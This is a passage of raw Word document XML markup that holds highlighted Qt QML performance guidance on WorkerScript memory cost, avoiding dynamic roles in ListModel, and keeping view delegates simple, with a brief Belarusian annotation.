            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>element will result in a separate JavaScript engine being created</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as the </w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript engine is per-thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). This will result in </w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>increased memory usage</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Multiple</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId651" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">elements will all use the same worker thread, however, </w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so the memory impact of using a second or third</w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId652" w:history="1">
        <w:r w:rsidRPr="009D67EF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D67EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>element is negligible once an application already uses one</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00662122">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="959" w:name="don-t-use-dynamic-roles"/>
      <w:bookmarkStart w:id="960" w:name="_Toc483000733"/>
      <w:bookmarkStart w:id="961" w:name="_Toc483604085"/>
      <w:bookmarkStart w:id="962" w:name="_Toc483605305"/>
      <w:bookmarkEnd w:id="959"/>
      <w:r w:rsidRPr="00662122">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Don't Use Dynamic Roles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="960"/>
      <w:bookmarkEnd w:id="961"/>
      <w:bookmarkEnd w:id="962"/>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The</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId653" w:history="1">
        <w:r w:rsidRPr="002E0E86">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>element in</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId654" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 is much more performant than in</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId655" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="002E0E86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The performance improvements mainly come from assumptions about the type of roles within each element in a given model - if the type doesn't change, the caching performance improves dramatically</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002E0E86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the type can change dynamically from element to element, this optimization becomes impossible, and the performance of the model will be an order of magnitude worse</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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Therefore, </w:t>
      </w:r>
      <w:r w:rsidRPr="002E0E86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamic typing is disabled by default</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; the developer must specifically set the boolean "</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0E86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamicRoles</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" property of the model to enable dynamic typing (and suffer the attendant performance degradation). We </w:t>
      </w:r>
      <w:r w:rsidRPr="002E0E86">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recommend that you do not use dynamic typing if it is possible to redesign your application to avoid it</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="002E0E86" w:rsidRDefault="005D1E34" w:rsidP="00662122">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="963" w:name="views"/>
      <w:bookmarkStart w:id="964" w:name="_Toc483000734"/>
      <w:bookmarkStart w:id="965" w:name="_Toc483003746"/>
      <w:bookmarkStart w:id="966" w:name="_Toc483604086"/>
      <w:bookmarkStart w:id="967" w:name="_Toc483605306"/>
      <w:bookmarkEnd w:id="963"/>
      <w:r w:rsidRPr="00662122">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="964"/>
      <w:bookmarkEnd w:id="965"/>
      <w:bookmarkEnd w:id="966"/>
      <w:bookmarkEnd w:id="967"/>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211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>View delegates should be kept as simple as possible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Have just enough QML in the delegate to display the necessary information. </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Any additional functionality which is not </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>immediately required (for example, if it displays more information when clicked) should not be created until needed</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see the upcoming section on </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lazy initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00211A68" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following list is a good </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>summary of things to keep in mind</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when designing a delegate:</w:t>
      </w:r>
      <w:r w:rsidR="00662122">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="00211A68" w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>важнейшае для практыкі разуменне паняцце траз</w:t>
      </w:r>
      <w:r w:rsidR="00662122">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The fewer elements that are in a delegate, the faster they can be created, and thus the faster the view can be scrolled</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00211A68" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keep the number of bindings in a delegate to a minimum; in particular, use anchors rather than bindings for relative positioning within a delegate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid using</w:t>
      </w:r>
      <w:r w:rsidR="00662122">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId656" w:history="1">
        <w:r w:rsidRPr="00211A68">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00662122">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>elements within delegates</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00887BE6" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887BE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Never enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00662122">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clipping</w:t>
      </w:r>
      <w:r w:rsidRPr="00887BE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a delegate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00812597" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You may set the</w:t>
      </w:r>
      <w:r w:rsidR="00812597">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00211A68">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cacheBuffer</w:t>
      </w:r>
      <w:r w:rsidR="00812597">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
